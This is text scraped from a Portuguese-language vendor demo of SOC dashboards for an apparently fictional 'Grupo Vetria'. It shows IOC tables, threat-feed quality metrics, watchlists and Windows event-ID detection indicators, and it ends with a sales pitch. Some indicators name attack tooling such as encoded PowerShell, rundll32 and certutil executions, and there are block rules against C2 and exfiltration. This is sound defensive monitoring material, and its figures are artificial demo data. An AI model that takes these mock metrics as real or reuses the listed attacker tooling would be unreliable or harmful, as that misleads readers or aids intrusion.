13h56203.0.113.61IPMISPFGTsrv-mail-01DENYscanner SMTP · TTL 30d
13h20b2b-vetria-portal.comDOMCERTRPZpdv-fil07-03NXDOMAINkit de phishing .br · AUTO
12h44203.0.113.90IPMISPFGTportal-vetriaFPCDN compartilhada · Aline F. · TK-30496
12h05sha256:41bc0e…9d12HSHMISPSIEMsrv-bkp-01→ N2CS-2219 · correlação em curso
11h32203.0.113.12IPCERTSIEMdc-spo-01FPNAT parceiro EDI · Douglas M. · TK-30508
✎ consulta: rule.groups=threat_intel AND !data.tag:fp · precisão 24h 96,7% (59/61) · FP ⇒ remove IOC + exceção nomeada
Aging & Expiração da Base
MISP last_seen · política TTL v1.4 · base 48.213
TTL IP 30dTTL domínio 90dTTL hash 365d312 renovados/7d▨ expira ≤30d+1,1k pós-EV-0142 · 72h
6.804
12.941
11.278
8.122
6.446
2.622
9.412 expiram ≤30d · 19,5% da base
<7d7–30d30–90d90–180d180–365d>1 ano
Qualidade dos Feeds · 30 dias
Shuffle PB-14 · hits 24h por origem: 35 · 18 · 8 (internos 0)feedprecisãocoberturalat. pubhits 14dveredito
feed comercial
TAXII · R$ 84k/ano
verdadeiros/hits94%
35 de 61 hits57%
2,1h
p95 4,8h
MANTER
MISP comunidade
instância local · R$ 0
verdadeiros/hits71%
18 de 61 hits30%
9,4h
p95 26h
MANTERrever dedup set/26
CERT.br
notificações · R$ 0
verdadeiros/hits88%
8 de 61 hits13%
5,2h
p95 11h
MANTER
✎ recomendação (Yasmin R.): manter os 3 · sobreposição MISP×comercial 6,4% — revisão set/26 · TK-30455
Watchlists Ativas · Wazuh CDB
/var/ossec/etc/lists/ · 4 listas · reload 10 min
WL-07
Infra do EV-2026-0142
38 IOCs · 8 hash · 21 IP · 9 dom · até fechamento do caso
3 hits/7d
todos bloqueados
ATIVARenata C.
WL-04
Typosquats vetria*
12 domínios · 2 registrados em jul · RPZ pré-bloqueio
1 hit/7d
14h51 · wks-fab-107
ATIVAAline F.
WL-02
ASNs bulletproof
7 ASNs · deny na borda · correlação GeoIP no SIEM
11 hits/7d
só varredura · sem caso
ATIVATúlio B.
WL-09
Contas vazadas · dump jun
41 contas monitoradas · reset forçado + MFA · TK-30488
8 matches
tratados · 0 pendente
TRATADAMarcos P.
MISP + feed comercial + CERT.br → FortiGate / DNS-RPZ / EDR / Wazuh · 48.213 IOCs ativos · 61 hits/24h · Grupo Vetria · dom 20/07 15:12
EV-16 · 16 de 17
Grupo Vetria / Segurança & SOC / Indicadores & Automação
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · Event Viewer · FortiGate · webhook ITSM·30 s ↻AO VIVO
Observabilidade → Ação · do evento ao ticket
Event Viewer + rede → Wazuh SIEM → webhook → ITSM · pipeline único · taxa de conversão por estágio · 24h1FONTES
214fontes de log
11,8k EPS méd · pico 23,4k · Event Viewer 6 DCs · FortiGate · Sysmon · NetFlow
4624/4625/4740/4688/7045/1102/4732/5140
⚠ QUEDA DE COLETA · fgt-fil12-01 · EPS = 0 há 3d
▸ingestsyslog / agente
2SIEM WAZUH
1,02Beventos/dia
3.428 regras (186 vet-*) · normaliza + correlaciona · 1.912 decoders
match hierárquico · rule.level ≥ 10
▸0,000034%vira sinal
3SINAIS
347alertas hoje
rule.level ≥ 10 → fila de triagem (EV-01) · 218 casos/mês
12,4k alertas/mês · MTTA 4,2 min
▸11,8%disparam
4WEBHOOKS
41exec/24h
regra dispara POST → ITSM · 87% auto / 13% humano · p50 4 min
PB-01 … PB-11 · SOAR Shuffle
▸22%viram ticket
5ITSM
9abertos
1 P1 · fila 28 · MTTR 38 min · 3 estouram SLA até 15h40
SLA P1 4h · contrato Vigia8
de 1,02B eventos/dia a 9 incidentes abertos — razão de ruído 1 : 113M1 fonte muda derruba a coleta antes do SIEM entrar: fgt-fil12-01 · 3d · abre webhook PB-11
Autenticação & Identidade2 disp·2 atn
Event Viewer · 4625/4624/4740/4732 · AD VETRIA.CORP · 5 indicadores
#01Falha vs Sucesso de Logon4625/4624
18.442falhas/24h
vs 96.418 sucessos · pico 1.208/h · 03h10
spray → sucesso em vpn-forti-01
spray → sucesso em vpn-forti-01
falha 16,1%sucesso 83,9%
DISPARADO→ webhook PB-01 · TK-30442
#02Bloqueio de Contas4740
47lockouts/24h
baseline 6 · possível
password spraying
password spraying
baseline 6limiar 20 · atual 47
ATENÇÃO→ watch · limiar 20/24h · vet-100061
#03Logon em Horário Anômalo4624 · RDP
3logons 02h–05h
fora do padrão · manutencao-predial
(terceiro) · 02h40
(terceiro) · 02h40
00h06h12h18h
ATENÇÃO→ watch · janela 08h–19h
#04Viagem Impossível4624 · GeoIP
1caso
adm.ti-03 · SP 15h02 →
nuvem UE 15h07
nuvem UE 15h07
DISPARADO→ webhook PB-06 · TK-30448
#05Modif. Grupo Privilegiado4732
1adição
Domain Admins · GMUD 2260
aprovada · Renata C.
aprovada · Renata C.
1 adição em 24h · 14h32 aprovada
APROVADAdentro do processo · GMUD 2260
Endpoint & Processos2 disp·1 atn
Sysmon EID1 · 4688 · 7045 · 1102 · console EDR · 4 indicadores
#06Processos Suspeitos4688 · EID1
9execuções
EV-2026-0142 · wks-fab-104
host isolado pelo EDR
host isolado pelo EDR
4-enc
3rundll32
2certutil
DISPARADO→ webhook PB-02 · isolar host
#07Novos Serviços7045
6/24h
baseline 2,1 · 1 binário NÃO
assinado em srv-arq-01
assinado em srv-arq-01
baseline 2,1limiar 4 · atual 6
ATENÇÃO→ verificar assinatura · TK-30481
#08Limpeza de Log1102
1evento
srv-web-01 · Security log
cleared · crítico
cleared · crítico
baseline 0 · 1 evento raro · limiar 1
DISPARADO→ investigação · TK-30412
#09Desativação de EDR/AVEDR · Defender
0hoje
baseline 0 · (1 no incidente
17/07, revertido)
17/07, revertido)
○ marca 17/07 revertida · limiar 1
NORMALdentro do baseline · limiar 1
Rede & Mov. Lateral2 atn·1 contido
5140 · NetFlow FortiGate · feed IOC · Threat Intel · 3 indicadores
#10Mapeamento de Shares5140
214acessos/5min
pico de 1 IP 10.20.x · baseline 30
movimento lateral em análise
movimento lateral em análise
pico 214/5min · baseline 30 · limiar 60
ATENÇÃO→ watch · limiar 60/5min · vet-100073
#11Egress AnômaloNetFlow · FGT
1,4GB out
pdv-fil07-03 → IP externo
desconhecido · rampa 6h
desconhecido · rampa 6h
1,4 GB em 6h · EV-0142 exfil bloqueada
EM ANÁLISE→ watch · TK-30474
#12C2 / IOC Threat Intelfeed IOC
61hits/24h
203.0.113.88 (C2 do
EV-0142) · bloqueado na borda
EV-0142) · bloqueado na borda
61 hits · 24h100% bloqueado
CONTIDO→ webhook PB-04 · DENY na borda
Operação & SLA1 atn·2 normal
Wazuh · webhook ITSM · contrato Vigia8 · 3 indicadores
#13Alertas → Incidentesruído · triagem
2,6% viram caso
347 alertas → 9 incidentes
taxa de ruído medida
taxa de ruído medida
alertas347
incidentes9
NORMALdentro da meta · < 5%
#14EPS por FonteWazuh · coleta
11,8kEPS agreg.
206/214 fontes ok · fgt-fil12-01
EPS = 0 há 3d (queda de coleta)
EPS = 0 há 3d (queda de coleta)
206 ok5 atraso · 3 mudas
ATENÇÃO→ webhook PB-11 · queda de coleta
#15MTTRITSM · Vigia8
38min (P1)
MTTD 4,2 min · SLA P1 4h
dentro do contrato
dentro do contrato
MTTR 38 minSLA 240 min (4h)
NORMALdentro do SLA · contrato Vigia8
Event Viewer + rede → Wazuh → webhook → ITSM · Grupo Vetria · dom 20/07 15:12
EV-17 · 17 de 17
Próximo passo
Vamos fechar o cerco?
Agende uma demo do NOC Flowbix e traga SIEM, firewall, EDR e os eventos do Windows para uma sala só — triagem com SLA em contagem regressiva, perímetro com dono de porta, cobertura da frota, identidade e a tela do board num painel único.
serviceFLOWBIX
Comercial · Flowbix✓
Conta verificada

Escaneie para iniciar uma conversa
Flowbix·Segurança & SOC · Grupo Vetria — demo
19 / 19